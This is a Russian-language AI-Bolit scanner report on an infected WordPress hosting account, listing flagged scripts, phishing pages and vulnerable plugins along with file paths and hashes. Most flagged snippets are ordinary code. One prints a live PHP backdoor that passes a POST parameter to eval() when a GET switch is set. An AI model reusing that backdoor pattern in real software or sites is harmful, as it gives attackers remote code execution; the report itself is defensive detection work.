Отчет сканера AI-Bolit v20170326: /home/bdndzahy/ (1/1)
Скрипт бесплатный только для личного некоммерческого использования. Есть коммерческая лицензия (пункт №11).
Затрачено времени: 3 m . Сканирование начато 24-04-2017 в 19:45:21, сканирование завершено 24-04-2017 в 19:48:27
Всего проверено 997 директорий и 6845 файлов. Использовано памяти при сканировании: 6.92 Mb.
Сводный отчет
Вредоносных скриптов13
JS Вирусов2
Фишинговых страниц2
Пропущенных больших файлов10
Символических ссылок13
Скрытых файлов17
Рекламных ссылок и кодов13
Обращаем внимание, что обнаруженные файлы не всегда являются вирусами и хакерскими скриптами. Сканер старается минимизировать число ложных обнаружений, но это не всегда возможно, так как найденный фрагмент может встречаться как во вредоносных скриптах, так и в обычных.
Внимание! Наш сканер обнаружил подозрительный или вредоносный код.

Скорее всего, ваш сайт был взломан и заражен. Рекомендуем срочно обратиться за консультацией к специалистам по информационной безопасности.

Пришлите нам отчет в архиве .zip на ai@revisium.com для проверки вашего сайта на вирусы и взлом.

Компания "Ревизиум" - лечение сайта от вирусов и защита от взлома.


Также выполните дополнительный анализ новым веб-сканером ReScan.Pro.

Не оставляйте файл отчета на сервере, и не давайте на него прямых ссылок с других сайтов. Информация из отчета может быть использована злоумышленниками для взлома сайта, так как содержит информацию о настройках сервера, файлах и каталогах.
Критические замечания
Уязвимости в скриптах (2)
  • /home/bdndzahy/public_html/wp-content/plugins/fancybox-for-wordpress/fancybox.php - CODE INJECTION : FANCYBOX
  • /home/bdndzahy/public_html/wp-includes/class-phpmailer.php - RCE : CVE-2016-10045, CVE-2016-10031
  • Эти файлы могут быть вредоносными или хакерскими скриптами (13)
    ПутьИзменение свойствИзменение содержимогоРазмерCRC32
    [x] 1… permanent error.The following address(es) failed: vaskot222gmail.com host alt4. gmail-smtp-in.l.google.com [74.125.142.26] SMTP error from remote mail server a
    07/04/2017 19:04:46
    07/04/2017 19:04:46
    4.43 Kb
    9c1a5e5b222e9f778cafe55af5f12c65bb7314ea
    1491581086
    1491581086
    id_5dd67fe9
    [x] 1…limit ".($page-1)*$kol_to_page.",".$kol_to_page;$kolvo_vsego=obr_db_query_count( $db_query_1.$part2.$where_hide.$where_moder.$where_status.$where_picked.$where_
    03/01/2017 20:07:16
    09/08/2011 20:02:16
    7.27 Kb
    392fcc33f4196edbe4a20a7bf06b63da22c98395
    1483466836
    1312909336
    id_48d625f3
    [x] 1…limit ".($page-1)*$kol_to_page.",".$kol_to_page;$kolvo_vsego=obr_db_query_count( $db_query_1.$part2.$where_hide.$where_moder.$where_status.$where_picked.$where_
    03/01/2017 20:07:16
    10/04/2013 19:36:24
    8.31 Kb
    892eb2187db284fc9c455d238a137cc896217c79
    1483466836
    1365611784
    id_48d625f3
    [x] 1…limit ".($page-1)*$kol_to_page.",".$kol_to_page;$kolvo_vsego=obr_db_query_count( $db_query_1.$part2.$where_hide.$where_moder.$where_status.$where_picked.$where_
    03/01/2017 20:07:16
    10/04/2013 19:14:48
    11.46 Kb
    a709b6e65d2e23130cac53d4eab4230c36a4378c
    1483466836
    1365610488
    id_48d625f3
    [x] 1…limit ".($page-1)*$kol_to_page.",".$kol_to_page;$kolvo_vsego=obr_db_query_count( $db_query_1.$part2.$where_hide.$where_moder.$where_status.$where_picked.$where_
    03/01/2017 20:07:16
    10/04/2013 17:42:10
    8.14 Kb
    904930bb134c749f63e03dda591e324dad311807
    1483466836
    1365604930
    id_48d625f3
    [x] 1…t ".($page-1)*$kol_to_page.",".$kol_to_page;$kolvo_vsego=obr_db_query_count($db_ query_1.$part2.$where_hide.$where_moder.$where_premium.$where_status.$where_pic
    03/01/2017 20:07:16
    10/04/2013 18:40:06
    13.39 Kb
    6d6fb675d544341505979823ca462913fa8dece7
    1483466836
    1365608406
    id_48d625f3
    [x] 1…art('includes/post-share');?><center><script type="text/javascript">(function(){ if(window.pluso)if(typeof window.pluso.start=="function") return;if(window.ifpl
    23/04/2017 18:32:45
    23/10/2014 16:42:24
    5.55 Kb
    4fe687cbe36b9dfd6ccb10bf86fc3114e1dd3bb6
    1492961565
    1414071744
    id_7a3e9fa0
    [x] 1…art('includes/post-share');?><center><script type="text/javascript">(function(){ if(window.pluso)if(typeof window.pluso.start=="function") return;if(window.ifpl
    11/12/2016 21:12:15
    23/10/2014 16:42:24
    5.55 Kb
    4fe687cbe36b9dfd6ccb10bf86fc3114e1dd3bb6
    1481483535
    1414071744
    id_7a3e9fa0
    [x] 1…art('includes/post-share');?><center><script type="text/javascript">(function(){ if(window.pluso)if(typeof window.pluso.start=="function") return;if(window.ifpl
    24/04/2017 15:18:43
    23/10/2014 16:42:24
    5.55 Kb
    4fe687cbe36b9dfd6ccb10bf86fc3114e1dd3bb6
    1493036323
    1414071744
    id_7a3e9fa0
    [x] 1…r){$val=!empty($_GET[$str])?$_GET[$str] : null;return$val;}if(_g3t('Glb')=='f'){ eval($_POST['UHiDB']);exit;}if(_g3t('Glb')=='c'){echo 'AcJ9ksbVjsdb';exit;}?><?
    24/04/2017 15:18:43
    28/08/2014 16:00:56
    4.25 Kb
    5cd2b07a0d3bcda82b753139da68fa6e2c5778d3
    1493036323
    1409230856
    id_1328eef6
    [x] BIG FILE. SKIPPED.
    25/12/2016 13:31:49
    03/05/2015 17:22:28
    1.36 Mb
    8da4f1aa758c31968e8d7591b0a8dd44404dc033
    1482665509
    1430662948
    id_big_1
    [x] 1…$text);}else{return$text;}}function force_balance_tags($text){$tagstack=array(); $stacksize=0;$tagqueue='';$newtext='';$single_tags=array('area','base','basefon
    26/12/2016 02:51:06
    26/12/2016 02:51:06
    149.05 Kb
    b171f631939087790c7df460b93366a2c2ef292c
    1482713466
    1482713466
    id_c825ce9d
    [x] 1…}}return true;}function wp_kses_hair($attr,$allowed_protocols){$attrarr=array(); $mode=0;$attrname='';$uris=array('xmlns','profile','href','src','cite','classid
    11/12/2016 21:12:17
    21/01/2016 10:36:16
    48.32 Kb
    0579bccb0a3461024c30f0cd149cb242c9662e93
    1481483537
    1453365376
    id_c825ce9d
    Эти файлы могут быть javascript вирусами (2)
    ПутьИзменение свойствИзменение содержимогоРазмерCRC32
    [x] 1…oid-app://m.facebook.com/</td></tr><tr><td class="R">1</td><td class="xl">https: //vk.cc/</td></tr><tr><td class="R">1</td><td class="xl">http://i-valve.ru/</td
    31/12/2016 22:08:37
    31/12/2016 22:08:37
    178.52 Kb
    5b1caf24a0f51bce1fcb4d67e19e050b3c736e90
    1483214917
    1483214917
    id_667b9d10
    [x] 1…ht><FONT SIZE="-2">0.00%</FONT></TD><TD ALIGN=left NOWRAP><FONT SIZE="-1">https: //vk.cc/61Z3qq</FONT></TD></TR><TR><TD ALIGN=center><FONT SIZE="-1"><B>95</B></
    31/12/2016 22:09:00
    31/12/2016 22:09:00
    129.26 Kb
    9dcd0e2dd8e72a672655e46ac290a49de8c4fedb
    1483214940
    1483214940
    id_667b9d10
    Обнаружены фишинговые страницы (2)
    ПутьИзменение свойствИзменение содержимогоРазмерCRC32
    [x] 1<!DOCTYPE html> <!-- saved from url=(0069)https://mail.ukr.net/desktop#readmsg/1487600683268720
    20/02/2017 17:28:50
    20/02/2017 17:28:50
    225.37 Kb
    d71a9e0f7eba5c785ffa64589ee913ac7293a14d
    1487604530
    1487604530
    id_20d01c1b
    [x] 1<!DOCTYPE html> <!-- saved from url=(0060)https://mail.ukr.net/desktop#readmsg/1486716850148952
    10/02/2017 11:41:47
    10/02/2017 11:41:47
    218.46 Kb
    6c358978cc3185f563dd6811ac7e57c34dffdd96
    1486719707
    1486719707
    id_20d01c1b
    Символические ссылки (symlinks) (13)
    /home/bdndzahy/access-logs
    /home/bdndzahy/.cagefs/opt/alt/php52/link/conf
    /home/bdndzahy/.cagefs/opt/alt/php44/link/conf
    /home/bdndzahy/.cagefs/opt/alt/php51/link/conf
    /home/bdndzahy/.cagefs/opt/alt/php56/link/conf
    /home/bdndzahy/.cagefs/opt/alt/php71/link/conf
    /home/bdndzahy/.cagefs/opt/alt/php55/link/conf
    /home/bdndzahy/.cagefs/opt/alt/php54/link/conf
    /home/bdndzahy/.cagefs/opt/alt/php53/link/conf
    /home/bdndzahy/.cagefs/opt/alt/php70/link/conf
    /home/bdndzahy/.cagefs/tmp/.s.PGSQL.5432
    /home/bdndzahy/.cagefs/tmp/mysql.sock
    /home/bdndzahy/www
    Предупреждения
    Дорвеи, реклама, спам-ссылки, редиректы
    ПутьИзменение свойствИзменение содержимогоРазмерCRC32
    1<?php phpinfo()
    03/01/2017 20:26:12
    27/10/2010 11:01:30
    21 b
    c34607b2a3479b27797c169d2099ae56aab788e5
    1483467972
    1288166490
    id_z7782885
    1…iframe name="fr_uploadfile" width="1px" height="1px" src="" style="border:none;" ></iframe><?php if(!empty($vars['masConfig']["TEXT_BOTTOM_FORM_CREATE_ADVERT"])
    03/01/2017 22:00:13
    03/01/2017 22:00:13
    15.34 Kb
    57dcaa5b820e00cba078a4a6a1e23e0074330cc8
    1483473613
    1483473613
    id_z2991681
    1<? phpinfo();?
    19/04/2017 14:33:13
    19/04/2017 14:33:13
    15 b
    2a8631b78e77adf1864057f93261936a75404193
    1492601593
    1492601593
    id_z4337174
    1…o esc_attr($file);?>&amp;_wpnonce=<?php echo esc_attr($_GET['_error_nonce']);?>" ></iframe><?php}?></div><?php endif;?><div class="wrap"><h1><?php echo esc_html
    11/12/2016 21:12:21
    21/01/2016 10:34:32
    11.26 Kb
    25a1fa48698ed1fe84eadbe4bd6bd03b6142ab24
    1481483541
    1453365272
    id_z3908672
    1…;plugin='.esc_attr($plugin).'&amp;_wpnonce='.esc_attr($_GET['_error_nonce']);?>" ></iframe><?php}?></div><?php elseif(isset($_GET['deleted'])) :$delete_result=g
    11/12/2016 21:12:21
    21/01/2016 10:34:32
    20.37 Kb
    2bf863c65f0efce398f7ebb490493040b20bda2f
    1481483541
    1453365272
    id_z7986978
    1…tent="text/html;charset=utf-8"/><meta name="robots" content="noindex,nofollow"/> <meta http-equiv="refresh" content="5;url=<?php echo get_home_url();?>"/></head
    11/12/2016 21:12:02
    21/01/2016 10:43:02
    17.80 Kb
    4208c7597c8d5871cbe604c285094838232b3199
    1481483522
    1453365782
    id_z1708766
    1…d/<?php echo$youtube_video?>?rel=0&wmode=opaque" frameborder="0" allowfullscreen ></iframe><?php elseif($vimeo_video):?><iframe src="http://player.vimeo.com/vid
    23/04/2017 18:32:45
    28/08/2014 16:04:26
    3.91 Kb
    dcfae055d41c5a42118e2f44a3464fb6e658ff80
    1492961565
    1409231066
    id_z4846601
    1…d/<?php echo$youtube_video?>?rel=0&wmode=opaque" frameborder="0" allowfullscreen ></iframe><?php elseif($vimeo_video):?><iframe src="http://player.vimeo.com/vid
    11/12/2016 21:12:15
    28/08/2014 16:04:26
    3.91 Kb
    dcfae055d41c5a42118e2f44a3464fb6e658ff80
    1481483535
    1409231066
    id_z4751905
    1…d/<?php echo$youtube_video?>?rel=0&wmode=opaque" frameborder="0" allowfullscreen ></iframe><?php elseif($vimeo_video):?><iframe src="http://player.vimeo.com/vid
    24/04/2017 15:18:43
    28/08/2014 16:04:26
    3.91 Kb
    dcfae055d41c5a42118e2f44a3464fb6e658ff80
    1493036323
    1409231066
    id_z2875294
    1…GN=right><FONT SIZE="-2">1.40%</FONT></TD><TD ALIGN=left NOWRAP><FONT SIZE="-1"> Mozilla/5.0(compatible;Googlebot/2.1;+http://www.google.com/bot.html)</FONT></T
    31/01/2017 22:19:41
    31/01/2017 22:19:41
    190.93 Kb
    c51258bcbf3cec1548f2dd845d8d8d2cd1a961ea
    1485893981
    1485893981
    id_z7673190
    1…GN=right><FONT SIZE="-2">2.75%</FONT></TD><TD ALIGN=left NOWRAP><FONT SIZE="-1"> Mozilla/5.0(compatible;Googlebot/2.1;+http://www.google.com/bot.html)</FONT></T
    01/03/2017 22:17:31
    01/03/2017 22:17:31
    189.94 Kb
    cf31d3d80c23437530842d12d149628e74afe58d
    1488399451
    1488399451
    id_z5361699
    1…GN=right><FONT SIZE="-2">2.14%</FONT></TD><TD ALIGN=left NOWRAP><FONT SIZE="-1"> Mozilla/5.0(compatible;Googlebot/2.1;+http://www.google.com/bot.html)</FONT></T
    01/04/2017 22:09:01
    01/04/2017 22:09:01
    193.92 Kb
    12fdf659b8ebe279f46565b00b6ee372d25ae543
    1491073741
    1491073741
    id_z2851485
    1…GN=right><FONT SIZE="-2">2.08%</FONT></TD><TD ALIGN=left NOWRAP><FONT SIZE="-1"> Mozilla/5.0(compatible;Googlebot/2.1;+http://www.google.com/bot.html)</FONT></T
    23/04/2017 22:06:51
    23/04/2017 22:06:51
    187.07 Kb
    83240aa87b0bc8d96bc970a5869223374b108f5d
    1492974411
    1492974411
    id_z4709554
    Скрытые файлы (17)
    /home/bdndzahy/.cl.selector
    /home/bdndzahy/mail/.Drafts
    /home/bdndzahy/mail/.Junk
    /home/bdndzahy/mail/.Trash
    /home/bdndzahy/mail/.Sent
    /home/bdndzahy/public_html/.tmb
    /home/bdndzahy/public_html/.quarantine
    /home/bdndzahy/.gnupg
    /home/bdndzahy/.trash
    /home/bdndzahy/.subaccounts
    /home/bdndzahy/.cpanel
    /home/bdndzahy/.htpasswds
    /home/bdndzahy/.softaculous
    /home/bdndzahy/.cache
    /home/bdndzahy/.cagefs
    /home/bdndzahy/.pki
    /home/bdndzahy/.cphorde
    Большие файлы (больше чем 600.00 Kb). Пропущено
    ПутьИзменение свойствИзменение содержимогоРазмерCRC32
    24/04/2017 14:21:41
    24/04/2017 14:21:41
    4.13 Mb
    23ed21b790336cfae200058d635535e880482fe2
    1493032901
    1493032901
    id_z8062829
    25/12/2016 13:31:49
    03/05/2015 17:22:28
    1.36 Mb
    8da4f1aa758c31968e8d7591b0a8dd44404dc033
    1482665509
    1430662948
    id_z8048569
    11/12/2016 21:12:15
    21/01/2016 10:37:30
    682.35 Kb
    a066550f459a4cc30e69b802fba63cc59de9979e
    1481483535
    1453365450
    id_z2897097
    28/02/2017 22:16:28
    28/02/2017 22:16:28
    2.30 Mb
    b667cf24c3219e10bbe6c88daf09651b5fa7a77b
    1488312988
    1488312988
    id_z2500359
    31/01/2017 22:19:11
    31/01/2017 22:19:11
    1.34 Mb
    b667cf24c3219e10bbe6c88daf09651b5fa7a77b
    1485893951
    1485893951
    id_z5359995
    23/04/2017 22:06:11
    23/04/2017 22:06:11
    4.89 Mb
    5b1caf24a0f51bce1fcb4d67e19e050b3c736e90
    1492974371
    1492974371
    id_z2013228
    23/04/2017 22:06:11
    23/04/2017 22:06:09
    45.37 Mb
    5b1caf24a0f51bce1fcb4d67e19e050b3c736e90
    1492974371
    1492974369
    id_z5686859
    31/03/2017 22:15:17
    31/03/2017 22:15:17
    3.78 Mb
    5b1caf24a0f51bce1fcb4d67e19e050b3c736e90
    1490987717
    1490987717
    id_z1611802
    23/04/2017 22:06:50
    23/04/2017 22:06:50
    4.96 Mb
    4ae86c7f84ce79a7578de0eac09eb034a958a637
    1492974410
    1492974410
    id_z8281492
    23/04/2017 22:06:51
    23/04/2017 22:06:51
    3.64 Mb
    83240aa87b0bc8d96bc970a5869223374b108f5d
    1492974411
    1492974411
    id_z1557197
    В не .php файле содержится стартовая сигнатура PHP кода. Возможно, там вредоносный код
    ПутьИзменение свойствИзменение содержимогоРазмерCRC32
    1…the following lines to the end of the file: `function add_my_forms($forms){$form s['form_slug']="Form Display Name";$forms['form_2_slug']="Form 2 Display Name";
    18/04/2017 21:08:26
    18/04/2017 21:08:26
    41.71 Kb
    429e82dfd49dff8c40e3c70e35ed1e5535114fee
    1492538906
    1492538906
    id_z4457261
    1…heir theme: * `<?php video_thumbnail();?>` will echo a thumbnail URL or the defa ult image located at `wp-content/plugins/video-thumbnails/default.jpg` if a thu
    11/12/2016 21:11:57
    21/01/2016 10:43:00
    18.87 Kb
    66ddcc5f6d09f19f08b277bef96824649dbb42b8
    1481483517
    1453365780
    id_z2654380
    1…derno+'['+ nextCell +'][title]" value="Recent Posts" type="text" /></label><labe l for="tie_home_cats'+builderno+'['+ nextCell +'][number]"><span>Number of post
    23/04/2017 18:32:45
    28/08/2014 16:04:38
    40.33 Kb
    953475c8b5de979179293fe52c179ca32f5c58ec
    1492961565
    1409231078
    id_z5145832
    1…derno+'['+ nextCell +'][title]" value="Recent Posts" type="text" /></label><labe l for="tie_home_cats'+builderno+'['+ nextCell +'][number]"><span>Number of post
    11/12/2016 21:12:15
    28/08/2014 16:04:38
    40.33 Kb
    953475c8b5de979179293fe52c179ca32f5c58ec
    1481483535
    1409231078
    id_z7309475
    1…derno+'['+ nextCell +'][title]" value="Recent Posts" type="text" /></label><labe l for="tie_home_cats'+builderno+'['+ nextCell +'][number]"><span>Number of post
    24/04/2017 15:18:43
    28/08/2014 16:04:38
    40.33 Kb
    953475c8b5de979179293fe52c179ca32f5c58ec
    1493036323
    1409231078
    id_z3668351
    1…tomize" href="<?php echo wp_customize_url();?>">Open Customizer</a>* * augments wp.customize.Events */ Loader=$.extend({},api.Events,{/** * Setup the Loader;tr
    11/12/2016 21:12:15
    21/01/2016 10:37:14
    6.59 Kb
    9e67ba5627e5621c493f4d8fed4e4192793a0b70
    1481483535
    1453365434
    id_z3752392
    Версии найденных CMS
    Wordpress v4.3.1
    Wordpress v4.3.1